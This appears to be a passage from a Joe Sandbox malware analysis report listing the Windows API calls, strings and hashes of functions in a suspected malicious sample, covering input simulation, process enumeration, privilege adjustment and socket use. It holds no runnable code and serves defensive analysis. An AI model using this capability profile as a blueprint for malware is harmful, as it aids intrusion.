                          • GetWindowRect.USER32(00000000), ref: 00782319
                          • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00782355
                          • GetCursorPos.USER32(?), ref: 00782381
                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 007823DF
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Window$Rectmouse_event$CursorDesktopForeground
                          • String ID:
                          • API String ID: 2387181109-0
                          APIs
                            • Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD
                          • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00779B78
                          • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00779C8B
                            • Part of subcall function 00773874: GetInputState.USER32 ref: 007738CB
                            • Part of subcall function 00773874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00773966
                          • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00779BA8
                          • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00779C75
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                          • String ID: *.*
                          • API String ID: 1972594611-438819550
                          APIs
                            • Part of subcall function 00719BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00719BB2
                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 00719A4E
                          • GetSysColor.USER32(0000000F), ref: 00719B23
                          • SetBkColor.GDI32(?,00000000), ref: 00719B36
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Color$LongProcWindow
                          • String ID:
                          • API String ID: 3131106179-0
                          • Opcode ID: aa5d306bc4fb6b25d84285639c2d718692fc1179688aaf66f75672815ab4662d
                          • Instruction ID: fa9fb979b4b9a8abd83038b5dbaaf2dcdb27c371972ee2d383b591a3d6ce0d24
                          • Opcode Fuzzy Hash: aa5d306bc4fb6b25d84285639c2d718692fc1179688aaf66f75672815ab4662d
                          • Instruction Fuzzy Hash: 98A12C70208444FEE7299A3CAC7DDFB26ADDF46341B158109FA02C66D1CA6DDD8BC276
                          APIs
                            • Part of subcall function 0078304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0078307A
                            • Part of subcall function 0078304E: _wcslen.LIBCMT ref: 0078309B
                          • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0078185D
                          • WSAGetLastError.WSOCK32 ref: 00781884
                          • bind.WSOCK32(00000000,?,00000010), ref: 007818DB
                          • WSAGetLastError.WSOCK32 ref: 007818E6
                          • closesocket.WSOCK32(00000000), ref: 00781915
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                          • String ID:
                          • API String ID: 1601658205-0
                          • Opcode ID: 042b1b62d62d0aacc20682e75686a9320eaefb0aba0dad433a7c534ddbedcaf3
                          • Instruction ID: 6b340168424aa650cb88e27bc7bee981ad4dfabc3ca856a51c8f7e1cbda0bf49
                          • Opcode Fuzzy Hash: 042b1b62d62d0aacc20682e75686a9320eaefb0aba0dad433a7c534ddbedcaf3
                          • Instruction Fuzzy Hash: AB51B471A40200DFDB10AF24C88AF6A77E5AB45718F488198F9059F3D3C779AD82CBE1
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                          • String ID:
                          • API String ID: 292994002-0
                          • Opcode ID: 170f03be6d94d5a48aded5a94273640ccf5b368b987c2a2261f874fc301a06f8
                          • Instruction ID: 609fdeaf0c89cd65391bff04e3da9645145d3aa290809b97a760acc8e2562fce
                          • Opcode Fuzzy Hash: 170f03be6d94d5a48aded5a94273640ccf5b368b987c2a2261f874fc301a06f8
                          • Instruction Fuzzy Hash: A221F9317402029FDB218F1AE844B267BE5EF86314F59C059E846CB351CB79EC42CBA4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID:
                          • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                          • API String ID: 0-1546025612
                          • Opcode ID: 6be77e76cd9be841cb72e7f69f76ca1cdaae1610947962009d2fb982f0aa63b2
                          • Instruction ID: 100ad4d40d3c9ab1b6cf53aba296b0d8d4313d968d405f65fac21772c694f171
                          • Opcode Fuzzy Hash: 6be77e76cd9be841cb72e7f69f76ca1cdaae1610947962009d2fb982f0aa63b2
                          • Instruction Fuzzy Hash: 0BA29270E0061ACBDF64CF58C8807ADB7B1BF55314F2482AAE855A7285EB789D81CF52
                          APIs
                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 007682AA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: lstrlen
                          • String ID: ($tb|$|
                          • API String ID: 1659193697-2513361831
                          • Opcode ID: ef443e257b3bfe07452c03d9e807cb340814fb8910b894f16fbf758dd181c2e8
                          • Instruction ID: d839e61fd71fa095c30abd39204c39127c505eeced341db5944735f6a982f892
                          • Opcode Fuzzy Hash: ef443e257b3bfe07452c03d9e807cb340814fb8910b894f16fbf758dd181c2e8
                          • Instruction Fuzzy Hash: 06323574A00605DFCB68CF59C080A6AB7F0FF48710B15C56EE89ADB3A1EB74E981CB45
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32 ref: 0078A6AC
                          • Process32FirstW.KERNEL32(00000000,?), ref: 0078A6BA
                            • Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD
                          • Process32NextW.KERNEL32(00000000,?), ref: 0078A79C
                          • CloseHandle.KERNEL32(00000000), ref: 0078A7AB
                            • Part of subcall function 0071CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00743303,?), ref: 0071CE8A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                          • String ID:
                          • API String ID: 1991900642-0
                          • Opcode ID: a316b06f99c7d6634209e29d5afa5f14bc3b6a56622999f5a5dbe1b3ce8df89b
                          • Instruction ID: 4807bf1d1ceb7b55dbac27bd87dd44c8d010b0e13f8b405c53724b2201fb8081
                          • Opcode Fuzzy Hash: a316b06f99c7d6634209e29d5afa5f14bc3b6a56622999f5a5dbe1b3ce8df89b
                          • Instruction Fuzzy Hash: 495130B1508301EFD710EF24C88AA5BBBE8FF89754F408A1DF58597291EB74E944CB92
                          APIs
                          • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0076AAAC
                          • SetKeyboardState.USER32(00000080), ref: 0076AAC8
                          • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0076AB36
                          • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0076AB88
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: KeyboardState$InputMessagePostSend
                          • String ID:
                          • API String ID: 432972143-0
                          • Opcode ID: 1eb86e18d7c6f1987e6ed55a673383b7b7c89f8a0e597056ba97414b236ac0da
                          • Instruction ID: 42fe0a5fa1f3c6f8a3b8ac98880bc3ab1f366b9e225c8904d3acda11500f318b
                          • Opcode Fuzzy Hash: 1eb86e18d7c6f1987e6ed55a673383b7b7c89f8a0e597056ba97414b236ac0da
                          • Instruction Fuzzy Hash: 4431EBB0A40248BEFF35CA65CC05BFE77A6AB45310F04421BE98A665D1D37D8D81CB66
                          APIs
                          • InternetReadFile.WININET(?,?,00000400,?), ref: 0077CE89
                          • GetLastError.KERNEL32(?,00000000), ref: 0077CEEA
                          • SetEvent.KERNEL32(?,?,00000000), ref: 0077CEFE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ErrorEventFileInternetLastRead
                          • String ID:
                          • API String ID: 234945975-0
                          • Opcode ID: 4471e6e6311524479db016ccd1d2fee1ec19b1901eba69fb6d71ceb4fb69471e
                          • Instruction ID: eb442695a758b6e0d1b0ca8c09716d4c06b4c511bac1d311c00054659091bc36
                          • Opcode Fuzzy Hash: 4471e6e6311524479db016ccd1d2fee1ec19b1901eba69fb6d71ceb4fb69471e
                          • Instruction Fuzzy Hash: 4121EDB25003059BEF32CFA5C948BA677F8EB04384F10841EE54A92151E7B8EE458B64
                          APIs
                          • FindFirstFileW.KERNEL32(?,?), ref: 00775CC1
                          • FindNextFileW.KERNEL32(00000000,?), ref: 00775D17
                          • FindClose.KERNEL32(?), ref: 00775D5F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Find$File$CloseFirstNext
                          • String ID:
                          • API String ID: 3541575487-0
                          • Opcode ID: 873264178caa024f790a865dc0005e46b457b55bbc44b80dc616350b9689854b
                          • Instruction ID: 8f557dc3466b4137d5828b3509a4e231b77cfb5664af1cf9e1917bb7f0647925
                          • Opcode Fuzzy Hash: 873264178caa024f790a865dc0005e46b457b55bbc44b80dc616350b9689854b
                          • Instruction Fuzzy Hash: 98518874604A01DFCB14CF28C498A96B7E4FF09314F14865EE95A8B3A1CB78FC04CB91
                          APIs
                          • IsDebuggerPresent.KERNEL32 ref: 0073271A
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00732724
                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00732731
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                          • String ID:
                          • API String ID: 3906539128-0
                          • Opcode ID: e30e88d4cdefeeae84418ad91618db82d3ca05cfeb30840254b8d6f3f943f7e9
                          • Instruction ID: 3771fb082489681d368f5fbca104276b4c1389ecfe6919453e10a5fd45f68121
                          • Opcode Fuzzy Hash: e30e88d4cdefeeae84418ad91618db82d3ca05cfeb30840254b8d6f3f943f7e9
                          • Instruction Fuzzy Hash: 8731B774911228ABCB21DF64DC8979DBBB8BF08310F5081DAE51CA7261E7349F818F95
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 007751DA
                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00775238
                          • SetErrorMode.KERNEL32(00000000), ref: 007752A1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ErrorMode$DiskFreeSpace
                          • String ID:
                          • API String ID: 1682464887-0
                          • Opcode ID: ff717a0f2dc84cfc14f59e66a44e2b9169e6db2cba6507509c17b27d06813a40
                          • Instruction ID: 621aca8f941c331f89beb534dabfc33664963163c32dcb3c7e2efb862c954dcc
                          • Opcode Fuzzy Hash: ff717a0f2dc84cfc14f59e66a44e2b9169e6db2cba6507509c17b27d06813a40
                          • Instruction Fuzzy Hash: 42317F75A00518DFDB00DF54D888EADBBF4FF08314F088099E809AB3A2CB35E856CB51
                          APIs
                            • Part of subcall function 0071FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00720668
                            • Part of subcall function 0071FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00720685
                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0076170D
                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0076173A
                          • GetLastError.KERNEL32 ref: 0076174A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                          • String ID:
                          • API String ID: 577356006-0
                          • Opcode ID: 588b399d07918a5745f0e75e2a88494c907b6009164f29cbae6449d60fccba26
                          • Instruction ID: ed699c9636141066ca403db2def240ebcd55c35581e976961a8f8a71987fa6cb
                          • Opcode Fuzzy Hash: 588b399d07918a5745f0e75e2a88494c907b6009164f29cbae6449d60fccba26
                          • Instruction Fuzzy Hash: 9411C1B2500304AFD7189F58EC8ADAAB7B9EB04714B24852EE45653281EB74FC418B24
                          APIs
                          • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0076D608
                          • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0076D645
                          • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0076D650
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CloseControlCreateDeviceFileHandle
                          • String ID:
                          • API String ID: 33631002-0
                          • Opcode ID: bb98524314c2a037e66ebfea2f7b54807d89789ff4faa0a5565de0600314b546
                          • Instruction ID: c72eb4ad336891608dff1efd019a5340a8fffdb25502bb4dcaa61d936398036d
                          • Opcode Fuzzy Hash: bb98524314c2a037e66ebfea2f7b54807d89789ff4faa0a5565de0600314b546
                          • Instruction Fuzzy Hash: 4F117C71E01228BBDB208F94DC45FAFBBBCEB45B50F108112F904E7290C2744A018BA5
                          APIs
                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0076168C
                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 007616A1
                          • FreeSid.ADVAPI32(?), ref: 007616B1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: AllocateCheckFreeInitializeMembershipToken
                          • String ID:
                          • API String ID: 3429775523-0
                          • Opcode ID: b51c31df177adaf2c17a87f3fa3e33aaca8ff2b8a7e1f5cef9605a1e06c66630
                          • Instruction ID: ac7549ccc5c8ee9f817959462fdab2b6159ebb7ed2265c6e1d3a68305cadfecd
                          • Opcode Fuzzy Hash: b51c31df177adaf2c17a87f3fa3e33aaca8ff2b8a7e1f5cef9605a1e06c66630
                          • Instruction Fuzzy Hash: 0CF0F475950309FBDF00DFE4DD89AAEBBBCEB08604F508565EA01E2191E778AA448A54
                          APIs
                          • GetCurrentProcess.KERNEL32(007328E9,?,00724CBE,007328E9,007C88B8,0000000C,00724E15,007328E9,00000002,00000000,?,007328E9), ref: 00724D09
                          • TerminateProcess.KERNEL32(00000000,?,00724CBE,007328E9,007C88B8,0000000C,00724E15,007328E9,00000002,00000000,?,007328E9), ref: 00724D10
                          • ExitProcess.KERNEL32 ref: 00724D22
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Process$CurrentExitTerminate
                          • String ID:
                          • API String ID: 1703294689-0
                          • Opcode ID: c4c23de33297f6b4fd376916e4c73c87be7253b85888fcf766d055e50fe0a77f
                          • Instruction ID: ad93dfd98e904bbaec83f1b5e3db5a3aada71c04eb7a910d579deacfa29a106d
                          • Opcode Fuzzy Hash: c4c23de33297f6b4fd376916e4c73c87be7253b85888fcf766d055e50fe0a77f
                          • Instruction Fuzzy Hash: E9E0B631100558FFCF22AF64EE0AA583B69EB41B81F108019FD098B122CB3DDD42CA95
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID:
                          • String ID: /
                          • API String ID: 0-2043925204
                          • Opcode ID: 77284bd3506bf3118ea1f636f46a92fd12c33621e9f402076c908a1df6f6250d
                          • Instruction ID: ef00b73fd7670f600e6999ebb2e887c027d71aa884a8dc4009e3b74cd24d58df
                          • Opcode Fuzzy Hash: 77284bd3506bf3118ea1f636f46a92fd12c33621e9f402076c908a1df6f6250d
                          • Instruction Fuzzy Hash: 7A414972500218AFDB249FB9CC4DEBB7778EB84314F1042A9F905E7182E634AD81CB50
                          APIs
                          • GetUserNameW.ADVAPI32(?,?), ref: 0075D28C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: NameUser
                          • String ID: X64
                          • API String ID: 2645101109-893830106
                          Strings
                          Similarity
                          • API ID:
                          • String ID: Variable is not of type 'Object'.$p#}
                          • API String ID: 0-2137504428
                          APIs
                          • FindFirstFileW.KERNEL32(?,?), ref: 00776918
                          • FindClose.KERNEL32(00000000), ref: 00776961
                          Similarity
                          • API ID: Find$CloseFileFirst
                          • String ID:
                          • API String ID: 2295610775-0
                          APIs
                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00784891,?,?,00000035,?), ref: 007737E4
                          • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00784891,?,?,00000035,?), ref: 007737F4
                          Similarity
                          • API ID: ErrorFormatLastMessage
                          • String ID:
                          • API String ID: 3479602957-0
                          APIs
                          • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0076B25D
